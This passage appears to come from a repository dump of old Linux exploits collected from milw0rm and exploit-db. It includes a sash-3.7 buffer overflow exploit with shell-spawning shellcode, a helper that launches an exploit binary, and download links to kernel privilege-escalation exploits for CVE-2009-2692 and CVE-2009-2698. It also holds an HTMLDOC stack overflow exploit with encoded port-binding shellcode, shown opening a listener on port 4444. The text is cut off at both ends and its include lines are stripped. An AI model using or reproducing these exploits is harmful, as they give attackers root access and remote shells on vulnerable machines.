| 55 | # milw0rm.com [2009-07-20] 56 | -------------------------------------------------------------------------------- /linux/linux_exploits/924.c: -------------------------------------------------------------------------------- 1 | /* sash-3.7 buffer overflow in c argyment 2 | written by lammat for practice purposes 3 | http://grpower.ath.cx 4 | lammat@iname.com 5 | 6 | (gdb) r -c `perl -e 'print "A"x10256'` 7 | The program being debugged has been started already. 8 | Start it from the beginning? (y or n) y 9 | Starting program: /sbin/sash -c `perl -e 'print "A"x10256'` 10 | warning: shared library handler failed to enable breakpoint 11 | 12 | Program received signal SIGSEGV, Segmentation fault. 13 | 0x41414141 in ?? () 14 | 15 | */ 16 | 17 | #include 18 | #include 19 | #include 20 | 21 | static char shellcode[]= 22 | "\x31\xdb\x53\x8d\x43\x17\xcd\x80\x99\x68\x6e\x2f\x73\x68\x68" 23 | "\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; 24 | 25 | 26 | #define NOP 0x90 27 | #define LEN 10256 28 | #define RET 0xbfff7770 29 | 30 | int main() 31 | { 32 | char buffer[LEN]; 33 | long retaddr = RET; 34 | int i; 35 | 36 | fprintf(stderr,"using address 0x%lx\n",retaddr); 37 | 38 | /* Filling the buffer... */ 39 | 40 | for (i=0;i Linux NULL pointer dereference due to incorrect proto_ops initializations 2 | > > ------------------------------------------------------------------------- 3 | 4 | Quick and dirty exploit for this one: 5 | 6 | http://www.frasunek.com/proto_ops.tgz 7 | back: http://www.exploit-db.com/sploits/2009-proto_ops.tgz 8 | 9 | # milw0rm.com [2009-08-14] 10 | -------------------------------------------------------------------------------- /linux/linux_exploits/9436b.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main(void) { 6 | if (personality(PER_SVR4) < 0) { 7 | perror("personality"); 8 | return -1; 9 | } 10 | 11 | fprintf(stderr, "padlina z lublina!\n"); 12 | 13 | execl("./exploit", "exploit", 0); 14 | } 15 | 16 | 17 | -------------------------------------------------------------------------------- /linux/linux_exploits/9477.txt: -------------------------------------------------------------------------------- 1 | Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later. 2 | 3 | orig: http://zenthought.org/content/file/android-root-2009-08-16-source 4 | back: http://www.exploit-db.com/sploits/android-root-20090816.tar.gz 5 | 6 | # milw0rm.com [2009-08-18] 7 | -------------------------------------------------------------------------------- /linux/linux_exploits/9545: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1N3/PrivEsc/33b129469180d85e77a03f1ba34b48e08843b20e/linux/linux_exploits/9545 -------------------------------------------------------------------------------- /linux/linux_exploits/9574.txt: -------------------------------------------------------------------------------- 1 | /* second verse, same as the first 2 | CVE-2009-2698 udp_sendmsg(), x86/x64 3 | Cheers to Julien/Tavis for the bug, p0c73n1 for just throwing code at 4 | NULL and finding it executed 5 | This exploit is a bit more nuanced and thoughtful ;) 6 | use ./therebel.sh for everything 7 | 8 | At this moment, when each of us must fit an arrow to his bow and 9 | enter the lists anew, to reconquer, within history and in spite of it, 10 | that which he owns already, the thin yield of his fields, the brief 11 | love of the earth, at this moment when at last a man is born, it is 12 | time to forsake our age and its adolescent furies. The bow bends; 13 | the wood complains. At the moment of supreme tension, there will 14 | leap into flight an unswerving arrow, a shaft that is inflexible and 15 | free. -Camus 16 | */ 17 | 18 | main: http://grsecurity.net/~spender/therebel.tgz 19 | back: http://exploit-db.com/sploits/2009-therebel.tgz 20 | 21 | # milw0rm.com [2009-09-02] 22 | -------------------------------------------------------------------------------- /linux/linux_exploits/9595.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | HTMLDOC 'html' File Handling Remote Stack Buffer Overflow Exploit (Linux) 4 | Reference: http://www.securityfocus.com/bid/35727 5 | 6 | Tested on HTMLDOC 1.8.27 on Debian 5.0 (+ASLR) 7 | Credit: ANTHRAX666 for finding the vulnerability 8 | 9 | Coded by Pankaj Kohli 10 | http://www.pank4j.com 11 | 12 | pankaj@zion:~/test/htmldoc$ cat /proc/sys/kernel/randomize_va_space 13 | 2 14 | pankaj@zion:~/test/htmldoc$ gcc htmldocb0f.c -o htmldocb0f 15 | pankaj@zion:~/test/htmldoc$ ./htmldocb0f 16 | 17 | [*] Creating buffer 18 | [*] Exploit file written to sploit.html 19 | Run as: htmldoc -f somefile.pdf sploit.html 20 | 21 | pankaj@zion:~/test/htmldoc$ netstat -an --inet | grep 4444 22 | pankaj@zion:~/test/htmldoc$ ./htmldoc-1.8.27/htmldoc/htmldoc -f abc.pdf sploit.html & 23 | [1] 3287 24 | pankaj@zion:~/test/htmldoc$ netstat -an --inet | grep 4444 25 | tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 26 | 27 | */ 28 | 29 | #include 30 | #include 31 | 32 | 33 | /* Port binding (xor encoded) shellcode (port 4444) */ 34 | char code[] = 35 | "\xeb\x12\x5b\x31\xc9\xb1\x75\x8a\x03\x34" 36 | "\x1e\x88\x03\x43\x66\x49\x75\xf5\xeb\x05" 37 | "\xe8\xe9\xff\xff\xff\x74\x78\x46\x74\x1f" 38 | "\x45\x2f\xd7\x4f\x74\x1f\x74\x1c\x97\xff" 39 | "\xd3\x9e\x97\xd8\x2f\xcc\x4c\x78\x76\x0f" 40 | "\x42\x78\x76\x1c\x1e\x97\xff\x74\x0e\x4f" 41 | "\x4e\x97\xff\xad\x1c\x74\x78\x46\xd3\x9e" 42 | "\xae\x78\xad\x1a\xd3\x9e\x4c\x48\x97\xff" 43 | "\x5d\x74\x78\x46\xd3\x9e\x97\xdd\x74\x1c" 44 | "\x47\x74\x21\x46\xd3\x9e\xfc\xe7\x74\x21" 45 | "\x46\xd3\x9e\x2f\xcc\x4c\x76\x70\x31\x6d" 46 | "\x76\x76\x31\x31\x7c\x77\x97\xfd\x4c\x78" 47 | "\x76\x33\x77\x97\xff\x4c\x4f\x4d\x97\xff" 48 | "\x74\x15\x46\xd3\x9e\x74\x1f\x46\x2f\xc5" 49 | "\xd3\x9e"; 50 | 51 | long jmp = 0x0804d938; // push esp; ret 0x0807; ;-) 52 | 53 | int main(int argc, char **argv, char **envp) { 54 | char buff[512]; 55 | int i; 56 | FILE *fd; 57 | 58 | printf("\n[*] Creating buffer\n"); 59 | strcpy(buff, "